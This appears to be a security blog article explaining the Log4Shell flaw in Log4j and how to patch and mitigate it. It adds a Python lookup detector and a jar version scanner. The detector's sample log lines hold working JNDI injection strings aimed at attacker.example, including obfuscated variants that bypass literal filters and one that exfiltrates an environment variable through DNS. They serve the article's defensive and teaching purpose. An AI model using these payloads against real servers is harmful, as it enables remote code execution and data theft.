In case you haven’t heard, a nightmare arrived just before the holidays kicked in. A critical flaw in Apache’s Log4j logging library, tracked as CVE-2021-44228 and nicknamed Log4Shell, was publicly disclosed on December 10, 2021, and has been described as one of the most severe vulnerabilities ever to hit the internet. Within days, attackers were reported to have attempted exploitation against more than 40% of business networks globally, and a large share of the world’s web servers were thought to be exposed. Twitter, Amazon, Microsoft, Apple, IBM, Oracle and Cisco are just some of the technology giants running the affected library, and Minecraft’s Java Edition was among the first widely publicised targets; hundreds of millions of devices are potentially exposed.
As businesses scramble to patch, it’s vital to understand what the Log4j vulnerability actually is and what steps to take to protect yourself.
What Is Log4j?
First, let’s talk about Log4j. Log4j is an open-source Java logging library developed by the Apache Software Foundation. Because it is Java, it runs wherever a Java runtime does: on Linux servers, Windows and macOS machines, cloud services and network appliances alike.
A logging library gives software a structured “log” or record of activity, similar to a diary, that developers use to debug problems and track what their systems are doing. Log4j spread to every corner of the internet because it is free, mature and easy to use: it is bundled into countless Java applications, frameworks and appliances, often several layers deep, so many organisations run it without knowing. That ubiquity is the problem. Any application that uses an affected Log4j 2 version (2.0-beta9 up to and including 2.14.1) and writes attacker-influenced text to a log is exploitable. The older Log4j 1.x line is not affected by CVE-2021-44228, but it has been unsupported since 2015 and carries its own unfixed issues, so it is no safe harbour either.
Analysts have warned that the vulnerability leaves critical infrastructure sectors open to intrusion, including power, energy, food, communications, manufacturing and water.
This vulnerable piece of code appears everywhere, from our children’s video games to the cloud infrastructure we all depend on.
How Does The Log4j Vulnerability Work?
Log4j 2 does more than write strings to a file: it interprets “lookups” of the form ${...} inside log messages and replaces them with values such as environment variables, system properties or, fatally, the result of a Java Naming and Directory Interface (JNDI) query. JNDI connects a Java program to directory services including the Lightweight Directory Access Protocol (LDAP), the Domain Name System (DNS) and Java Remote Method Invocation (RMI). Because affected versions performed these lookups on the log message itself, an attacker only has to get a string such as ${jndi:ldap://attacker.example/a} into something the application logs: a User-Agent header, a username, a chat message. Log4j then connects to the attacker’s LDAP or RMI server, which can answer with a reference to a remote Java class that the vulnerable JVM downloads and executes, giving unauthenticated remote code execution on the server. Even where newer JVM defaults block remote class loading, the same mechanism leaks data: lookups nest, so the value of an environment variable or system property can be spliced into the hostname the server resolves, and the attacker reads it out of their DNS or LDAP logs. Nothing runs in the victim’s browser; the vulnerable code runs on the server, and no authentication is needed, which is why this was treated as a zero-day emergency.
The real problem with Log4j attacks is timing. Attackers know patches exist and that the most exposed systems are being fixed as fast as possible, so instead of careful, targeted campaigns they rush to compromise as many hosts as they can while the window is open, dropping cryptominers, botnet clients, web shells and backdoors that survive on the machine after the hole itself is closed. Patching a system that was already exploited does not remove those implants. Weeks or months later the dormant access is activated or sold on, and that is when the more sophisticated and damaging attacks begin.
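To make the lookup mechanism concrete, here is an added example, written in Python for this page rather than taken from the article or from Apache Log4j (which is Java): a toy re-implementation of the ${...} substitution described above, in which the jndi prefix records where a vulnerable Log4j would have connected instead of connecting, run over a few constructed access-log lines. The environment table and the attacker.example hostnames are made up. It shows why a detection rule that looks for the literal text ${jndi: misses two of the four attack lines.

```python
"""Toy model of Log4j 2 message lookups, plus a detector for JNDI lookup strings.

Added example: not code from the original article or from Apache Log4j.
It re-implements just enough of Log4j 2's ${...} lookup syntax (nesting,
prefixes, the ":-" default) to show why grepping logs or requests for the
literal text "${jndi:" misses real attacks.
"""
import re

# Stand-in for the process environment that ${env:NAME} would read (constructed).
FAKE_ENV = {"HOSTNAME": "app-01", "JAVA_VERSION": "1.8.0_181"}

# Innermost ${...}: a body that contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _lookup(prefix, key, jndi_targets):
    """Resolve one ${prefix:key} lookup the way Log4j 2.x does for these prefixes."""
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "env":
        return FAKE_ENV.get(key, "")
    if prefix == "jndi":
        # Log4j 2.0-beta9 .. 2.14.1 would now connect to this URL (LDAP, RMI, DNS...)
        # and use whatever the remote server returns. We only record the target.
        jndi_targets.append(key)
        return "[jndi result]"
    return None  # unknown prefix: Log4j leaves the variable unexpanded


def _expand_one(body, jndi_targets):
    """Expand the body of a single innermost ${...}; None means it cannot be resolved."""
    var, default = body.split(":-", 1) if ":-" in body else (body, None)
    value = None
    if ":" in var:
        prefix, key = var.split(":", 1)
        value = _lookup(prefix, key, jndi_targets)
    return default if value is None else value


def resolve(message, max_passes=20):
    """Expand nested lookups innermost-first, like Log4j's StrSubstitutor.

    Returns (expanded_text, jndi_targets). max_passes bounds the work a
    hostile message can cause.
    """
    jndi_targets = []
    for _ in range(max_passes):
        changed = False

        def repl(match):
            nonlocal changed
            value = _expand_one(match.group(1), jndi_targets)
            if value is None:
                return match.group(0)
            changed = True
            return value

        message = _INNER.sub(repl, message)
        if not changed:
            break
    return message, jndi_targets


def scan(lines):
    """Map 1-based line numbers to the JNDI URLs a vulnerable Log4j would contact."""
    hits = {}
    for number, line in enumerate(lines, 1):
        _, targets = resolve(line)
        if targets:
            hits[number] = targets
    return hits


# Constructed access-log lines: the last quoted field is the User-Agent header,
# a favourite injection point because most web apps log it verbatim.
SAMPLE_LOG = [
    '203.0.113.7 - - "GET /index.html" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET /" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - "GET /" 200 "${${lower:J}ndi:${lower:L}dap://attacker.example/b}"',
    '203.0.113.10 - - "GET /" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '203.0.113.11 - - "GET /" 200 "${jndi:ldap://${env:HOSTNAME}.exfil.attacker.example/d}"',
]

if __name__ == "__main__":
    for number, targets in scan(SAMPLE_LOG).items():
        naive = "${jndi:" in SAMPLE_LOG[number - 1]
        print(f"line {number}: JNDI lookup to {targets} (literal '${{jndi:' present: {naive})")
```

Lines 3 and 4 contain no literal ${jndi: at all, yet resolve to exactly the same lookup as line 2, and line 5 shows the hostname of the victim being smuggled out inside the URL. Any detection built on pattern matching has to normalise the nested syntax first, which is why a firewall rule is only a speed bump here.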
What Can You Do To Protect Yourself From The Log4j Vulnerability?
Thankfully, fixes (“patches”) and guidance are widely available. The Apache Software Foundation has released fixed versions of Log4j 2; the first fix, 2.15.0, turned out to be incomplete, so the version to aim for is 2.17.0 or later (the 2.12 and 2.3 lines have equivalent releases for Java 7 and Java 6). Microsoft and other vendors have asked customers to check with each software supplier whether the product uses Java and Log4j, and whether a fixed build is available.
Companies should inventory every internet-facing application that uses Log4j, prioritise patching those, watch the alerts those systems produce for exploitation attempts, and put a web application firewall with automatically updated rules in front of them. Treat the firewall as a speed bump, not a fix: the lookup syntax allows nesting and obfuscation, so simple pattern blocks are routinely bypassed. Where a vendor patch is not yet available, the stop-gap Apache recommends is to remove the JndiLookup class from the log4j-core jar on disk and restart the application; the earlier advice to set the property that disables message lookups does not cover every configuration and is no longer considered sufficient. Blocking outbound LDAP and RMI connections from servers also blunts the attack.
For people who can’t fix the problem right away, free “vaccine” tools have been published that use the vulnerability itself to switch off message lookups inside a running, unpatched process. This buys time only: the change is lost when the application restarts, and it is no substitute for upgrading.
Lastly, keep an eye out for updates to your devices, software and apps as vendors work through their dependencies; many products will need more than one round of fixes.
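The steps above amount to: find where Log4j 2 is, check the version, patch or mitigate, and repeat as vendors ship fixes. Here is an added example, Python written for this page rather than a tool from the article or from Apache, that does the finding and checking: it walks a directory, opens every jar/war/ear including archives nested inside archives, reads the Log4j version from the bundled Maven pom.properties and tests for the JndiLookup class. The fixed-version thresholds are Apache’s published releases; the sample deployment it scans is constructed in a temporary directory so the example runs offline.

```python
"""Inventory scanner: find log4j-core inside jar/war/ear files and classify it.

Added example; not code from the original article or from Apache. Fixed
versions follow Apache's advisories: 2.17.0+ (Java 8+), 2.12.3+ (Java 7),
2.3.1+ (Java 6). Removing JndiLookup.class is a mitigation, not a patch.
"""
import io
import re
import shutil
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'version=2.14.1' -> (2, 14, 1); None when no dotted version is present."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(part) for part in match.groups()) if match else None


def inspect_archive(zf, depth=0):
    """Return (version, has_jndi_class) for log4j-core in this archive or nested ones."""
    version, has_jndi = None, False
    for name in zf.namelist():
        if name == JNDI_CLASS:
            has_jndi = True
        elif name == POM_PROPS:
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = parse_version(line)
        elif name.lower().endswith(ARCHIVE_SUFFIXES) and depth < 3:
            try:  # fat jars and WARs carry log4j-core as a nested archive
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inner_version, inner_jndi = inspect_archive(inner, depth + 1)
            except zipfile.BadZipFile:
                continue  # a .jar entry that is not actually a zip file
            version = version or inner_version
            has_jndi = has_jndi or inner_jndi
    return version, has_jndi


def classify(version, has_jndi):
    """Verdict for one archive, based on version first and the JNDI class second."""
    if version is None:
        return "review: JndiLookup present, version unknown" if has_jndi else "no log4j-core"
    fixed = (version >= (2, 17, 0)
             or (2, 12, 3) <= version < (2, 13, 0)
             or (2, 3, 1) <= version < (2, 4, 0))
    if fixed:
        return "fixed"
    if not has_jndi:
        return "mitigated: JndiLookup.class removed"
    return "VULNERABLE"


def scan_dir(root):
    """Return {relative path: (version, verdict)} for every archive carrying log4j-core."""
    root, results = Path(root), {}
    for path in root.rglob("*"):
        if not (path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES):
            continue
        try:
            with zipfile.ZipFile(path) as zf:
                version, has_jndi = inspect_archive(zf)
        except zipfile.BadZipFile:
            continue
        verdict = classify(version, has_jndi)
        if verdict != "no log4j-core":
            results[path.relative_to(root).as_posix()] = (version, verdict)
    return results


def _fake_log4j_core(version, with_jndi=True):
    """Constructed stand-in for a log4j-core jar: real entry paths, empty class bodies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"")
    return buf.getvalue()


def build_fixture(root):
    """Constructed deployment: vulnerable, fixed and hardened jars, a WAR, an unrelated jar."""
    lib = Path(root) / "lib"
    lib.mkdir(parents=True, exist_ok=True)
    (lib / "log4j-core-2.14.1.jar").write_bytes(_fake_log4j_core("2.14.1"))
    (lib / "log4j-core-2.17.0.jar").write_bytes(_fake_log4j_core("2.17.0"))
    (lib / "log4j-core-2.11.2.jar").write_bytes(_fake_log4j_core("2.11.2", with_jndi=False))
    with zipfile.ZipFile(lib / "commons-io-2.8.0.jar", "w") as zf:
        zf.writestr("org/apache/commons/io/IOUtils.class", b"")
    with zipfile.ZipFile(Path(root) / "app.war", "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", _fake_log4j_core("2.13.3"))
        war.writestr("WEB-INF/lib/broken.jar", b"not a zip file")


def demo():
    """Build the fixture in a temporary directory, scan it, clean up, return the results."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    try:
        build_fixture(root)
        return scan_dir(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, (version, verdict) in sorted(demo().items()):
        print(f"{verdict:42} {'.'.join(map(str, version)) if version else '?':8} {path}")
```

Two caveats a practitioner should keep in mind. A “mitigated” verdict means the class was cut out of the jar on disk; the running process is only safe once it has been restarted from that jar, and the long-term answer is still the upgrade. And shaded or relocated builds may drop pom.properties or move the package, so an on-disk scan complements, rather than replaces, checking what the JVM actually has loaded.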
If you are concerned about any of the software you run, or are simply unsure, it’s critical that you get this checked to minimise any risk to your business. Cyber threats are a continuing challenge even without vulnerabilities of this kind. Reach out to me if you are concerned about your systems or would like to discuss your cyber security approach.